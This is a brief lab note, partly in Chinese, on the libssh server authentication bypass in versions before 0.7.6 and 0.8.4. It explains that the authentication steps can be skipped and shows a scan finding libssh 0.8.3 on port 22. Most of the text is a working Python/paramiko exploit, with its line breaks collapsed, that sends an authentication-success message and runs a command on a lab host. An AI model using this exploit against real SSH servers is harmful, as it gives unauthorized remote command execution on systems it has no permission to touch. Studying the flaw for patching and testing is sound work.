漏洞原理
认证实现错误,
认证分为多个步骤,可以直接跳到成功的步骤
A vulnerability was found in libssh's server-side state machine before versions 0.7.6 and 0.8.4.
22/tcp open ssh libssh 0.8.3 (protocol 2.0)
| ssh-hostkey:
|_ 2048 fe:d7:54:08:9d:1c:ba:18:4c:ba:22:3c:75:c9:39:5e (RSA)
import paramiko import socket sock = socket.socket() try: sock.connect((str('192.168.232.198'), int(22))) message = paramiko.message.Message() transport = paramiko.transport.Transport(sock) transport.start_client() message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS) transport._send_message(message) cmd = transport.open_session() stdin, stdout, stderr = cmd.exec_command("touch /tmp/3") res,err = stdout.read(),stderr.read() result = res if res else err print(result) except: pass